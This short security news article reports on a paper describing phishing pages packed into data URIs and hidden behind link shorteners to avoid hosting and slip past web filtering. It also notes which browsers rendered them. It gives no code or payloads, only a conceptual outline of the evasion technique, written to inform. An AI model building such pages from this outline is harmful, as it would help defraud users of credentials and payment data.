Phishing is an attack through which criminals design sites that look similar to that of banks, e-commerce sites and by masquerading them as legitimate sites they get gullible users into entering personal information, credit card details and the likes. The main hurdle that these criminals face is to find a server to host such a site and to quickly fool as many users as possible before hosting companies and law enforcement authorities block them.
The new paper claims that malicious web pages can be stored into data URIs (Uniform Resource Identifiers) whereby an entire webpage’s code can be stuffed into a string, which if clicked on will instruct the browser to unpack the payload and present it to the user in form of a page.
Till recent times, stuffing a web page into a URI would have definitely raised suspicion because of the size of the data string – pretty long in most of the cases. But, with the advent of link shortening services, this URI can now fit into just few characters and it can be shared through social networking sites, file sharing sites, emails, etc.
This is where the whole thing gets a bit dangerous. In his paper, Phishing by data URI [PDF], Henning Klevjer has claimed that through his method he was able to successfully load the pages on Firefox and Opera. The method however failed on Google Chrome and Internet Explorer.
The new phishing method can also get around defense systems such as web filtering. Sophos notes that criminals may also stuff malicious Java applet into data URIs and this is particularly dangerous in wake of recent Java vulnerabilities.